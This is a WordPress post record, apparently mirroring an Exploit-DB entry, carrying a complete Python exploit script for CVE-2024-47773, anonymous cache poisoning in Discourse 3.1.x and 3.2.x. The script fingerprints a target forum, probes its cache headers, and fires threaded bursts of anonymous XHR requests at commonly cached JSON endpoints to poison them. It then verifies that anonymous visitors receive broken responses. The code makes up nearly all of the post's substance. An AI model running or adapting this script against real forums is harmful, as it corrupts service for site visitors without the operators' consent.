{"id":7819,"date":"2025-07-08T13:33:31","date_gmt":"2025-07-08T13:33:31","guid":{"rendered":"http:\/\/localhost\/?p=7819"},"modified":"2025-07-08T13:33:31","modified_gmt":"2025-07-08T13:33:31","slug":"discourse-32x-anonymous-cache-poisoning","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=7819","title":{"rendered":"Discourse 3.2.x &#8211; Anonymous Cache Poisoning"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Discourse 3.2.x &#8211; Anonymous Cache Poisoning<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52358<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-08T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-08T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">8.2<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:L<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2024-47773<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n!\/usr\/bin\/env python3 &quot;&quot;&quot; Exploit Title: Discourse&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n#!\/usr\/bin\/env python3<br \/>\n<br \/>&#8220;&#8221;&#8221;<br \/>\n<br \/>Exploit Title: Discourse 3.2.x &#8211; Anonymous Cache Poisoning<br \/>\n<br \/>Date: 2024-10-15<br \/>\n<br \/>Exploit Author: ibrahimsql<br \/>\n<br \/>Github: : https:\/\/github.com\/ibrahmsql<br \/>\n<br \/>Vendor Homepage: https:\/\/discourse.org<br \/>\n<br \/>Software Link: https:\/\/github.com\/discourse\/discourse<br \/>\n<br \/>Version: Discourse < latest (patched)\n<br \/>Tested on: Discourse 3.1.x, 3.2.x<br \/>\n<br \/>CVE: CVE-2024-47773<br \/>\n<br \/>CVSS: 7.1 (AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:L)<\/p>\n<p>Description:<br \/>\n<br \/>Discourse anonymous cache poisoning vulnerability allows attackers to poison<br \/>\n<br \/>the cache with responses without preloaded data through multiple XHR requests.<br \/>\n<br \/>This affects only anonymous visitors of the site.<\/p>\n<p>Reference:<br \/>\n<br \/>https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-47773<br \/>\n<br \/>&#8220;&#8221;&#8221;<\/p>\n<p>import requests<br \/>\n<br \/>import sys<br \/>\n<br \/>import argparse<br \/>\n<br \/>import time<br \/>\n<br \/>import threading<br \/>\n<br \/>import json<br \/>\n<br \/>from urllib.parse import urljoin<\/p>\n<p>class DiscourseCachePoisoning:<br \/>\n<br \/>    def __init__(self, target_url, threads=10, timeout=10):<br \/>\n<br \/>        self.target_url = target_url.rstrip(&#8216;\/&#8217;)<br \/>\n<br \/>        self.threads = threads<br \/>\n<br \/>        self.timeout = timeout<br \/>\n<br \/>        self.session = requests.Session()<br \/>\n<br \/>        self.session.headers.update({<br \/>\n<br \/>            &#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;,<br \/>\n<br \/>            &#8216;Accept&#8217;: &#8216;application\/json, text\/javascript, *\/*; q=0.01&#8217;,<br \/>\n<br \/>            &#8216;X-Requested-With&#8217;: &#8216;XMLHttpRequest&#8217;<br \/>\n<br \/>        })<br \/>\n<br \/>        self.poisoned = False<\/p>\n<p>    def check_target(self):<br \/>\n<br \/>        &#8220;&#8221;&#8221;Check if target is accessible and running Discourse&#8221;&#8221;&#8221;<br \/>\n<br \/>        try:<br \/>\n<br \/>            response = self.session.get(f&#8221;{self.target_url}\/&#8221;, timeout=self.timeout)<br \/>\n<br \/>            if response.status_code == 200:<br \/>\n<br \/>                if &#8216;discourse&#8217; in response.text.lower() or &#8216;data-discourse-setup&#8217; in response.text:<br \/>\n<br \/>                    return True<br \/>\n<br \/>        except Exception as e:<br \/>\n<br \/>            print(f&#8221;[-] Error checking target: {e}&#8221;)<br \/>\n<br \/>        return False<\/p>\n<p>    def check_anonymous_cache(self):<br \/>\n<br \/>        &#8220;&#8221;&#8221;Check if anonymous cache is enabled&#8221;&#8221;&#8221;<br \/>\n<br \/>        try:<br \/>\n<br \/>            # Test endpoint that should be cached for anonymous users<br \/>\n<br \/>            response = self.session.get(f&#8221;{self.target_url}\/categories.json&#8221;, timeout=self.timeout)<\/p>\n<p>            # Check cache headers<br \/>\n<br \/>            cache_headers = [&#8216;cache-control&#8217;, &#8216;etag&#8217;, &#8216;last-modified&#8217;]<br \/>\n<br \/>            has_cache = any(header in response.headers for header in cache_headers)<\/p>\n<p>            if has_cache:<br \/>\n<br \/>                print(&#8220;[+] Anonymous cache appears to be enabled&#8221;)<br \/>\n<br \/>                return True<br \/>\n<br \/>            else:<br \/>\n<br \/>                print(&#8220;[-] Anonymous cache may be disabled&#8221;)<br \/>\n<br \/>                return False<\/p>\n<p>        except Exception as e:<br \/>\n<br \/>            print(f&#8221;[-] Error checking cache: {e}&#8221;)<br \/>\n<br \/>            return False<\/p>\n<p>    def poison_cache_worker(self, endpoint):<br \/>\n<br \/>        &#8220;&#8221;&#8221;Worker function for cache poisoning attempts&#8221;&#8221;&#8221;<br \/>\n<br \/>        try:<br \/>\n<br \/>            # Create session without cookies to simulate anonymous user<br \/>\n<br \/>            anon_session = requests.Session()<br \/>\n<br \/>            anon_session.headers.update({<br \/>\n<br \/>                &#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;,<br \/>\n<br \/>                &#8216;Accept&#8217;: &#8216;application\/json, text\/javascript, *\/*; q=0.01&#8217;,<br \/>\n<br \/>                &#8216;X-Requested-With&#8217;: &#8216;XMLHttpRequest&#8217;<br \/>\n<br \/>            })<\/p>\n<p>            # Make rapid requests to poison cache<br \/>\n<br \/>            for i in range(50):<br \/>\n<br \/>                response = anon_session.get(<br \/>\n<br \/>                    f&#8221;{self.target_url}{endpoint}&#8221;,<br \/>\n<br \/>                    timeout=self.timeout<br \/>\n<br \/>                )<\/p>\n<p>                # Check if response lacks preloaded data<br \/>\n<br \/>                if response.status_code == 200:<br \/>\n<br \/>                    try:<br \/>\n<br \/>                        data = response.json()<br \/>\n<br \/>                        # Check for missing preloaded data indicators<br \/>\n<br \/>                        if self.is_poisoned_response(data):<br \/>\n<br \/>                            print(f&#8221;[+] Cache poisoning successful on {endpoint}&#8221;)<br \/>\n<br \/>                            self.poisoned = True<br \/>\n<br \/>                            return True<br \/>\n<br \/>                    except:<br \/>\n<br \/>                        pass<\/p>\n<p>                time.sleep(0.1)<\/p>\n<p>        except Exception as e:<br \/>\n<br \/>            pass<br \/>\n<br \/>        return False<\/p>\n<p>    def is_poisoned_response(self, data):<br \/>\n<br \/>        &#8220;&#8221;&#8221;Check if response indicates successful cache poisoning&#8221;&#8221;&#8221;<br \/>\n<br \/>        # Look for indicators of missing preloaded data<br \/>\n<br \/>        indicators = [<br \/>\n<br \/>            # Missing or empty preloaded data<br \/>\n<br \/>            not data.get(&#8216;preloaded&#8217;, True),<br \/>\n<br \/>            data.get(&#8216;preloaded&#8217;) == {},<br \/>\n<br \/>            # Missing expected fields<br \/>\n<br \/>            &#8216;categories&#8217; in data and not data[&#8216;categories&#8217;],<br \/>\n<br \/>            &#8216;topics&#8217; in data and not data[&#8216;topics&#8217;],<br \/>\n<br \/>            # Error indicators<br \/>\n<br \/>            data.get(&#8216;error&#8217;) is not None,<br \/>\n<br \/>            data.get(&#8216;errors&#8217;) is not None<br \/>\n<br \/>        ]<\/p>\n<p>        return any(indicators)<\/p>\n<p>    def test_cache_poisoning(self):<br \/>\n<br \/>        &#8220;&#8221;&#8221;Test cache poisoning on multiple endpoints&#8221;&#8221;&#8221;<br \/>\n<br \/>        print(&#8220;[*] Testing cache poisoning vulnerability&#8230;&#8221;)<\/p>\n<p>        # Target endpoints that are commonly cached<br \/>\n<br \/>        endpoints = [<br \/>\n<br \/>            &#8216;\/categories.json&#8217;,<br \/>\n<br \/>            &#8216;\/latest.json&#8217;,<br \/>\n<br \/>            &#8216;\/top.json&#8217;,<br \/>\n<br \/>            &#8216;\/c\/general.json&#8217;,<br \/>\n<br \/>            &#8216;\/site.json&#8217;,<br \/>\n<br \/>            &#8216;\/site\/basic-info.json&#8217;<br \/>\n<br \/>        ]<\/p>\n<p>        threads = []<\/p>\n<p>        for endpoint in endpoints:<br \/>\n<br \/>            print(f&#8221;[*] Testing endpoint: {endpoint}&#8221;)<\/p>\n<p>            # Create multiple threads to poison cache<br \/>\n<br \/>            for i in range(self.threads):<br \/>\n<br \/>                thread = threading.Thread(<br \/>\n<br \/>                    target=self.poison_cache_worker,<br \/>\n<br \/>                    args=(endpoint,)<br \/>\n<br \/>                )<br \/>\n<br \/>                threads.append(thread)<br \/>\n<br \/>                thread.start()<\/p>\n<p>            # Wait for threads to complete<br \/>\n<br \/>            for thread in threads:<br \/>\n<br \/>                thread.join(timeout=5)<\/p>\n<p>            if self.poisoned:<br \/>\n<br \/>                break<\/p>\n<p>            time.sleep(1)<\/p>\n<p>        return self.poisoned<\/p>\n<p>    def verify_poisoning(self):<br \/>\n<br \/>        &#8220;&#8221;&#8221;Verify if cache poisoning was successful&#8221;&#8221;&#8221;<br \/>\n<br \/>        print(&#8220;[*] Verifying cache poisoning&#8230;&#8221;)<\/p>\n<p>        # Test with fresh anonymous session<br \/>\n<br \/>        verify_session = requests.Session()<br \/>\n<br \/>        verify_session.headers.update({<br \/>\n<br \/>            &#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;<br \/>\n<br \/>        })<\/p>\n<p>        try:<br \/>\n<br \/>            response = verify_session.get(f&#8221;{self.target_url}\/categories.json&#8221;, timeout=self.timeout)<\/p>\n<p>            if response.status_code == 200:<br \/>\n<br \/>                try:<br \/>\n<br \/>                    data = response.json()<br \/>\n<br \/>                    if self.is_poisoned_response(data):<br \/>\n<br \/>                        print(&#8220;[+] Cache poisoning verified &#8211; anonymous users affected&#8221;)<br \/>\n<br \/>                        return True<br \/>\n<br \/>                    else:<br \/>\n<br \/>                        print(&#8220;[-] Cache poisoning not verified&#8221;)<br \/>\n<br \/>                except:<br \/>\n<br \/>                    print(&#8220;[-] Unable to parse response&#8221;)<br \/>\n<br \/>            else:<br \/>\n<br \/>                print(f&#8221;[-] Unexpected response code: {response.status_code}&#8221;)<\/p>\n<p>        except Exception as e:<br \/>\n<br \/>            print(f&#8221;[-] Error verifying poisoning: {e}&#8221;)<\/p>\n<p>        return False<\/p>\n<p>    def exploit(self):<br \/>\n<br \/>        &#8220;&#8221;&#8221;Main exploit function&#8221;&#8221;&#8221;<br \/>\n<br \/>        print(f&#8221;[*] Testing Discourse Cache Poisoning (CVE-2024-47773)&#8221;)<br \/>\n<br \/>        print(f&#8221;[*] Target: {self.target_url}&#8221;)<\/p>\n<p>        if not self.check_target():<br \/>\n<br \/>            print(&#8220;[-] Target is not accessible or not running Discourse&#8221;)<br \/>\n<br \/>            return False<\/p>\n<p>        print(&#8220;[+] Target confirmed as Discourse instance&#8221;)<\/p>\n<p>        if not self.check_anonymous_cache():<br \/>\n<br \/>            print(&#8220;[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)&#8221;)<br \/>\n<br \/>            print(&#8220;[*] Continuing with exploit attempt&#8230;&#8221;)<\/p>\n<p>        success = self.test_cache_poisoning()<\/p>\n<p>        if success:<br \/>\n<br \/>            print(&#8220;[+] Cache poisoning attack successful!&#8221;)<br \/>\n<br \/>            self.verify_poisoning()<br \/>\n<br \/>            print(&#8220;\\n[!] Impact: Anonymous visitors may receive responses without preloaded data&#8221;)<br \/>\n<br \/>            print(&#8220;[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE&#8221;)<br \/>\n<br \/>            return True<br \/>\n<br \/>        else:<br \/>\n<br \/>            print(&#8220;[-] Cache poisoning attack failed&#8221;)<br \/>\n<br \/>            print(&#8220;[*] Target may be patched or cache disabled&#8221;)<br \/>\n<br \/>            return False<\/p>\n<p>def main():<br \/>\n<br \/>    parser = argparse.ArgumentParser(description=&#8217;Discourse Anonymous Cache Poisoning (CVE-2024-47773)&#8217;)<br \/>\n<br \/>    parser.add_argument(&#8216;-u&#8217;, &#8216;&#8211;url&#8217;, required=True, help=&#8217;Target Discourse URL&#8217;)<br \/>\n<br \/>    parser.add_argument(&#8216;-t&#8217;, &#8216;&#8211;threads&#8217;, type=int, default=10, help=&#8217;Number of threads (default: 10)&#8217;)<br \/>\n<br \/>    parser.add_argument(&#8216;&#8211;timeout&#8217;, type=int, default=10, help=&#8217;Request timeout (default: 10)&#8217;)<\/p>\n<p>    args = parser.parse_args()<\/p>\n<p>    exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)<\/p>\n<p>    try:<br \/>\n<br \/>        success = exploit.exploit()<br \/>\n<br \/>        sys.exit(0 if success else 1)<br \/>\n<br \/>    except KeyboardInterrupt:<br \/>\n<br \/>        print(&#8220;\\n[-] Exploit interrupted by user&#8221;)<br \/>\n<br \/>        sys.exit(1)<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        print(f&#8221;[-] Exploit failed: {e}&#8221;)<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>if __name__ == &#8216;__main__&#8217;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52358\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Discourse 3.2.x &#8211; Anonymous Cache Poisoning Exploit ID EDB-ID:52358 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information CVSS Score&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,77,12,40,15,13,7,11,5],"class_list":["post-7819","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-82","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Discourse 3.2.x - Anonymous Cache Poisoning - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=7819\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Discourse 3.2.x - Anonymous Cache Poisoning - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Discourse 3.2.x &#8211; Anonymous Cache Poisoning Exploit ID EDB-ID:52358 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information CVSS Score...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=7819\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-08T13:33:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7819#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7819\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Discourse 3.2.x &#8211; Anonymous Cache Poisoning\",\"datePublished\":\"2025-07-08T13:33:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7819\"},\"wordCount\":989,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.2\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7819#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7819\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7819\",\"name\":\"Discourse 3.2.x - Anonymous Cache Poisoning - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-07-08T13:33:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7819#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7819\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7819#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Discourse 3.2.x &#8211; Anonymous Cache Poisoning\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Discourse 3.2.x - Anonymous Cache Poisoning - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=7819","og_locale":"en_US","og_type":"article","og_title":"Discourse 3.2.x - Anonymous Cache Poisoning - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Discourse 3.2.x &#8211; Anonymous Cache Poisoning Exploit ID EDB-ID:52358 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information CVSS Score...","og_url":"https:\/\/zero.redgem.net\/?p=7819","og_site_name":"zero redgem","article_published_time":"2025-07-08T13:33:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=7819#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=7819"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Discourse 3.2.x &#8211; Anonymous Cache Poisoning","datePublished":"2025-07-08T13:33:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=7819"},"wordCount":989,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.2","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=7819#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=7819","url":"https:\/\/zero.redgem.net\/?p=7819","name":"Discourse 3.2.x - Anonymous Cache Poisoning - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-07-08T13:33:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=7819#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=7819"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=7819#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Discourse 3.2.x &#8211; Anonymous Cache Poisoning"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7819","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7819"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7819\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7819"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7819"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7819"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}